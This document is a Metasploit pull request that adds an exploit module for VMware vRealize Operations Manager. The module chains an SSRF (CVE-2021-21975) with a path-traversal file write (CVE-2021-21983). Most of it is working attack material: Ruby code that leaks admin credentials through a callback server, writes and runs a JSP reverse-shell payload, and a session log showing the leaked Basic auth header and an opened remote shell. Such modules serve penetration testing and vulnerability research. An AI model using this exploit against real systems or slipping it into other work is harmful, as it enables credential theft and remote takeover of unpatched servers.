### PR TITLE
Add VMware vRealize Operations (vROps) Manager SSRF RCE (CVE-2021-21975 + CVE-2021-21983)

### DIFF
--- a/documentation/modules/exploit/linux/http/vmware_vrops_mgr_ssrf_rce.md
+++ b/documentation/modules/exploit/linux/http/vmware_vrops_mgr_ssrf_rce.md
@@ -15,7 +15,8 @@ The following vRealize Operations Manager versions are vulnerable:
 * 8.2.0
 * 8.3.0
 
-Version 8.3.0 is not exploitable for creds. Tested against 8.0.1.
+Version 8.3.0 is not exploitable for creds and is therefore not
+supported by this module. Tested against 8.0.1.
 
 [CVE-2021-21975]: https://nvd.nist.gov/vuln/detail/CVE-2021-21975
 [CVE-2021-21983]: https://nvd.nist.gov/vuln/detail/CVE-2021-21983
@@ -23,8 +24,11 @@ Version 8.3.0 is not exploitable for creds. Tested against 8.0.1.
 ### Setup
 
 Import an exploitable vRealize Operations Manager OVA, such as
-`vRealize-Operations-Manager-Appliance-8.0.1.15331180_OVF10.ova`, into
+[vRealize-Operations-Manager-Appliance-8.0.1.15331180_OVF10.ova], into
 your desired hypervisor.
+
+[vRealize-Operations-Manager-Appliance-8.0.1.15331180_OVF10.ova]:
+https://my.vmware.com/web/vmware/downloads/details?downloadGroup=VROPS-801&productId=940&rPId=40733
 
 ## Verification Steps
 
@@ -81,6 +85,8 @@ msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > set rhosts 192.168.123.185
 rhosts => 192.168.123.185
 msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > set lhost 192.168.123.1
 lhost => 192.168.123.1
+msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > set verbose true
+verbose => true
 msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > run
 
 [*] Started reverse TCP handler on 192.168.123.1:4444

--- a/documentation/modules/exploit/linux/http/vmware_vrops_mgr_ssrf_rce.md
+++ b/documentation/modules/exploit/linux/http/vmware_vrops_mgr_ssrf_rce.md
@@ -6,6 +6,10 @@ This module exploits a pre-auth SSRF ([CVE-2021-21975]) and post-auth
 file write ([CVE-2021-21983]) in VMware vRealize Operations Manager to
 leak admin creds and write/execute a JSP payload.
 
+CVE-2021-21975 affects the `/casa/nodes/thumbprints` endpoint, and
+CVE-2021-21983 affects the `/casa/private/config/slice/ha/certificate`
+endpoint. Code execution occurs as the `admin` Unix user.
+
 The following vRealize Operations Manager versions are vulnerable:
 
 * 7.0.0

--- a/documentation/modules/exploit/linux/http/vmware_vrops_mgr_ssrf_rce.md
+++ b/documentation/modules/exploit/linux/http/vmware_vrops_mgr_ssrf_rce.md
@@ -1,0 +1,124 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a pre-auth SSRF ([CVE-2021-21975]) and post-auth
+file write ([CVE-2021-21983]) in VMware vRealize Operations Manager to
+leak admin creds and write/execute a JSP payload.
+
+The following vRealize Operations Manager versions are vulnerable:
+
+* 7.0.0
+* 7.5.0
+* 8.0.0, 8.0.1
+* 8.1.0, 8.1.1
+* 8.2.0
+* 8.3.0
+
+Version 8.3.0 is not exploitable for creds. Tested against 8.0.1.
+
+[CVE-2021-21975]: https://nvd.nist.gov/vuln/detail/CVE-2021-21975
+[CVE-2021-21983]: https://nvd.nist.gov/vuln/detail/CVE-2021-21983
+
+### Setup
+
+Import an exploitable vRealize Operations Manager OVA, such as
+`vRealize-Operations-Manager-Appliance-8.0.1.15331180_OVF10.ova`, into
+your desired hypervisor.
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### 0
+
+`vRealize Operations Manager < 8.3.0`
+
+## Scenarios
+
+### vRealize Operations Manager 8.0.1
+
+```
+msf6 > use exploit/linux/http/vmware_vrops_mgr_ssrf_rce
+[*] Using configured payload java/jsp_shell_reverse_tcp
+msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > options
+
+Module options (exploit/linux/http/vmware_vrops_mgr_ssrf_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      443              yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8443             yes       The local port to listen on.
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (java/jsp_shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+   SHELL                   no        The system shell to use.
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   vRealize Operations Manager < 8.3.0
+
+
+msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > set rhosts 192.168.123.185
+rhosts => 192.168.123.185
+msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > set lhost 192.168.123.1
+lhost => 192.168.123.1
+msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > run
+
+[*] Started reverse TCP handler on 192.168.123.1:4444
+[*] Starting SSRF server...
+[*] Using URL: https://0.0.0.0:8443/XtwOOPWn9SJ7
+[*] Local IP: https://192.168.1.65:8443/XtwOOPWn9SJ7
+[*] Executing automatic check (disable AutoCheck to override)
+[*] Leaking admin creds via SSRF...
+[*] 192.168.123.1:8443/XtwOOPWn9SJ7#
+[*] 192.168.123.185 connected to SSRF server!
+GET /XtwOOPWn9SJ7 HTTP/1.1
+Accept: application/xml, application/json
+Content-Type: application/json
+Accept-Charset: big5, big5-hkscs, cesu-8, euc-jp, euc-kr, gb18030, gb2312, gbk, ibm-thai, ibm00858, ibm01140, ibm01141, ibm01142, ibm01143, ibm01144, ibm01145, ibm01146, ibm01147, ibm01148, ibm01149, ibm037, ibm1026, ibm1047, ibm273, ibm277, ibm278, ibm280, ibm284, ibm285, ibm290, ibm297, ibm420, ibm424, ibm437, ibm500, ibm775, ibm850, ibm852, ibm855, ibm857, ibm860, ibm861, ibm862, ibm863, ibm864, ibm865, ibm866, ibm868, ibm869, ibm870, ibm871, ibm918, iso-2022-cn, iso-2022-jp, iso-2022-jp-2, iso-2022-kr, iso-8859-1, iso-8859-13, iso-8859-15, iso-8859-2, iso-8859-3, iso-8859-4, iso-8859-5, iso-8859-6, iso-8859-7, iso-8859-8, iso-8859-9, jis_x0201, jis_x0212-1990, koi8-r, koi8-u, shift_jis, tis-620, us-ascii, utf-16, utf-16be, utf-16le, utf-32, utf-32be, utf-32le, utf-8, windows-1250, windows-1251, windows-1252, windows-1253, windows-1254, windows-1255, windows-1256, windows-1257, windows-1258, windows-31j, x-big5-hkscs-2001, x-big5-solaris, x-compound_text, x-euc-jp-linux, x-euc-tw, x-eucjp-open, x-ibm1006, x-ibm1025, x-ibm1046, x-ibm1097, x-ibm1098, x-ibm1112, x-ibm1122, x-ibm1123, x-ibm1124, x-ibm1166, x-ibm1364, x-ibm1381, x-ibm1383, x-ibm300, x-ibm33722, x-ibm737, x-ibm833, x-ibm834, x-ibm856, x-ibm874, x-ibm875, x-ibm921, x-ibm922, x-ibm930, x-ibm933, x-ibm935, x-ibm937, x-ibm939, x-ibm942, x-ibm942c, x-ibm943, x-ibm943c, x-ibm948, x-ibm949, x-ibm949c, x-ibm950, x-ibm964, x-ibm970, x-iscii91, x-iso-2022-cn-cns, x-iso-2022-cn-gb, x-iso-8859-11, x-jis0208, x-jisautodetect, x-johab, x-macarabic, x-maccentraleurope, x-maccroatian, x-maccyrillic, x-macdingbat, x-macgreek, x-machebrew, x-maciceland, x-macroman, x-macromania, x-macsymbol, x-macthai, x-macturkish, x-macukraine, x-ms932_0213, x-ms950-hkscs, x-ms950-hkscs-xp, x-mswin-936, x-pck, x-sjis_0213, x-utf-16le-bom, x-utf-32be-bom, x-utf-32le-bom, x-windows-50220, x-windows-50221, x-windows-874, x-windows-949, x-windows-950, x-windows-iso2022jp
+X-VSCM-Request-Id: S30000FM
+Authorization: Basic bWFpbnRlbmFuY2VBZG1pbjpLWGp3ZWlmZlBIMGNlM3o5RENRb2o3V1I=
+Cache-Control: no-cache
+Pragma: no-cache
+User-Agent: Java/1.8.0_212
+Host: 192.168.123.1:8443
+Connection: keep-alive
+
+
+[+] Successfully leaked admin creds
+[*] Authorization: Basic bWFpbnRlbmFuY2VBZG1pbjpLWGp3ZWlmZlBIMGNlM3o5RENRb2o3V1I=
+[+] The target is vulnerable.
+[*] Writing JSP payload
+[*] /usr/lib/vmware-casa/casa-webapp/webapps/casa/0DlEVqGWYr.jsp
+[+] Successfully wrote JSP payload
+[*] Executing JSP payload
+[*] https://192.168.123.185/casa/0DlEVqGWYr.jsp
+[+] Successfully executed JSP payload
+[+] Deleted /usr/lib/vmware-casa/casa-webapp/webapps/casa/0DlEVqGWYr.jsp
+[*] Command shell session 1 opened (192.168.123.1:4444 -> 192.168.123.185:59260) at 2021-04-11 12:19:21 -0500
+[*] Server stopped.
+
+id
+uid=1000(admin) gid=1003(admin) groups=1003(admin),0(root),25(apache),28(wheel)
+uname -a
+Linux vRealizeClusterNode 4.19.69-1.ph3 #1-photon SMP Fri Sep 6 00:00:41 UTC 2019 x86_64 GNU/Linux
+```

--- a/modules/exploits/linux/http/vmware_vrops_mgr_ssrf_rce.rb
+++ b/modules/exploits/linux/http/vmware_vrops_mgr_ssrf_rce.rb
@@ -1,0 +1,198 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'VMware vRealize Operations (vROps) Manager SSRF RCE',
+        'Description' => %q{
+          This module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth
+          file write (CVE-2021-21983) in VMware vRealize Operations Manager to
+          leak admin creds and write/execute a JSP payload.
+
+          The following vRealize Operations Manager versions are vulnerable:
+
+          * 7.0.0
+          * 7.5.0
+          * 8.0.0, 8.0.1
+          * 8.1.0, 8.1.1
+          * 8.2.0
+          * 8.3.0
+
+          Version 8.3.0 is not exploitable for creds. Tested against 8.0.1.
+        },
+        'Author' => [
+          'Egor Dimitrenko', # Discovery
+          'wvu' # Analysis and exploit
+        ],
+        'References' => [
+          ['CVE', '2021-21975'], # SSRF
+          ['CVE', '2021-21983'], # File write
+          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'],
+          ['URL', 'https://twitter.com/ptswarm/status/1376961747232382976'],
+          ['URL', 'https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis']
+        ],
+        'DisclosureDate' => '2021-03-30', # Vendor advisory
+        'License' => MSF_LICENSE,
+        'Platform' => 'linux',
+        'Arch' => ARCH_JAVA,
+        'Privileged' => false,
+        'Targets' => [
+          ['vRealize Operations Manager < 8.3.0', {}]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SRVPORT' => 8443,
+          'SSL' => true,
+          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [
+            IOC_IN_LOGS, # /usr/lib/vmware-casa/casa-webapp/logs
+            ARTIFACTS_ON_DISK # /usr/lib/vmware-casa/casa-webapp/webapps/casa
+          ]
+        },
+        'Stance' => Stance::Aggressive
+      )
+    )
+
+    register_options([
+      Opt::RPORT(443),
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def setup
+    super
+
+    @creds = nil
+
+    print_status('Starting SSRF server...')
+    start_service
+  end
+
+  def check
+    leak_admin_creds ? CheckCode::Vulnerable : CheckCode::Safe
+  end
+
+  def exploit
+    return unless (@creds ||= leak_admin_creds)
+
+    write_jsp_payload
+    execute_jsp_payload
+  end
+
+  def leak_admin_creds
+    ssrf_uri = "#{srvhost_addr}:#{srvport}#{get_resource}#"
+
+    print_status('Leaking admin creds via SSRF...')
+    vprint_status(ssrf_uri)
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/casa/nodes/thumbprints'),
+      'ctype' => 'application/json',
+      'data' => [ssrf_uri].to_json
+    )
+
+    unless res&.code == 200 && res.get_json_document.dig(0, 'address') == ssrf_uri
+      print_error('Failed to send SSRF request')
+      return
+    end
+
+    unless @creds
+      print_error('Failed to leak admin creds')
+      return
+    end
+
+    print_good('Successfully leaked admin creds')
+    vprint_status("Authorization: #{@creds}")
+
+    @creds
+  end
+
+  def on_request_uri(cli, request)
+    print_status("#{cli.peerhost} connected to SSRF server!")
+    vprint_line(request.to_s)
+
+    @creds ||= request.headers['Authorization']
+  ensure
+    send_not_found(cli)
+    close_client(cli)
+  end
+
+  def write_jsp_payload
+    jsp_path = "/usr/lib/vmware-casa/casa-webapp/webapps/casa/#{jsp_filename}"
+
+    print_status('Writing JSP payload')
+    vprint_status(jsp_path)
+
+    multipart_form = Rex::MIME::Message.new
+    multipart_form.add_part(
+      "../../../../..#{jsp_path}",
+      nil, # Content-Type
+      nil, # Content-Transfer-Encoding
+      'form-data; name="name"'
+    )
+    multipart_form.add_part(
+      payload.encoded,
+      nil, # Content-Type
+      nil, # Content-Transfer-Encoding
+      %(form-data; name="file"; filename="#{jsp_filename}")
+    )
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/casa/private/config/slice/ha/certificate'),
+      'authorization' => @creds,
+      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
+      'data' => multipart_form.to_s
+    )
+
+    unless res&.code == 200
+      fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')
+    end
+
+    register_file_for_cleanup(jsp_path)
+
+    print_good('Successfully wrote JSP payload')
+  end
+
+  def execute_jsp_payload
+    jsp_uri = normalize_uri(target_uri.path, 'casa', jsp_filename)
+
+    print_status('Executing JSP payload')
+    vprint_status(full_uri(jsp_uri))
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => jsp_uri,
+      'authorization' => @creds
+    )
+
+    unless res&.code == 200
+      fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')
+    end
+
+    print_good('Successfully executed JSP payload')
+  end
+
+  def jsp_filename
+    @jsp_filename ||= "#{rand_text_alphanumeric(8..16)}.jsp"
+  end
+
+end

--- a/modules/exploits/linux/http/vmware_vrops_mgr_ssrf_rce.rb
+++ b/modules/exploits/linux/http/vmware_vrops_mgr_ssrf_rce.rb
@@ -31,7 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote
           * 8.2.0
           * 8.3.0
 
-          Version 8.3.0 is not exploitable for creds. Tested against 8.0.1.
+          Version 8.3.0 is not exploitable for creds and is therefore not
+          supported by this module. Tested against 8.0.1.
         },
         'Author' => [
           'Egor Dimitrenko', # Discovery

--- a/modules/exploits/linux/http/vmware_vrops_mgr_ssrf_rce.rb
+++ b/modules/exploits/linux/http/vmware_vrops_mgr_ssrf_rce.rb
@@ -22,6 +22,10 @@ class MetasploitModule < Msf::Exploit::Remote
           file write (CVE-2021-21983) in VMware vRealize Operations Manager to
           leak admin creds and write/execute a JSP payload.
 
+          CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and
+          CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate
+          endpoint. Code execution occurs as the "admin" Unix user.
+
           The following vRealize Operations Manager versions are vulnerable:
 
           * 7.0.0

--- a/modules/exploits/linux/http/vmware_vrops_mgr_ssrf_rce.rb
+++ b/modules/exploits/linux/http/vmware_vrops_mgr_ssrf_rce.rb
@@ -97,6 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def leak_admin_creds
+    # "Comment out" trailing path using URI fragment syntax, ostensibly
     ssrf_uri = "#{srvhost_addr}:#{srvport}#{get_resource}#"
 
     print_status('Leaking admin creds via SSRF...')


### PR DESCRIPTION
```
msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > info

       Name: VMware vRealize Operations (vROps) Manager SSRF RCE
     Module: exploit/linux/http/vmware_vrops_mgr_ssrf_rce
   Platform: Linux
       Arch: java
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2021-03-30

Provided by:
  Egor Dimitrenko
  wvu <wvu@metasploit.com>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   vRealize Operations Manager < 8.3.0

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      443              yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8443             yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth
  file write (CVE-2021-21983) in VMware vRealize Operations Manager to
  leak admin creds and write/execute a JSP payload. CVE-2021-21975
  affects the /casa/nodes/thumbprints endpoint, and CVE-2021-21983
  affects the /casa/private/config/slice/ha/certificate endpoint. Code
  execution occurs as the "admin" Unix user. The following vRealize
  Operations Manager versions are vulnerable: * 7.0.0 * 7.5.0 * 8.0.0,
  8.0.1 * 8.1.0, 8.1.1 * 8.2.0 * 8.3.0 Version 8.3.0 is not
  exploitable for creds and is therefore not supported by this module.
  Tested against 8.0.1.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-21975
  https://nvd.nist.gov/vuln/detail/CVE-2021-21983
  https://www.vmware.com/security/advisories/VMSA-2021-0004.html
  https://twitter.com/ptswarm/status/1376961747232382976
  https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis

msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) >
```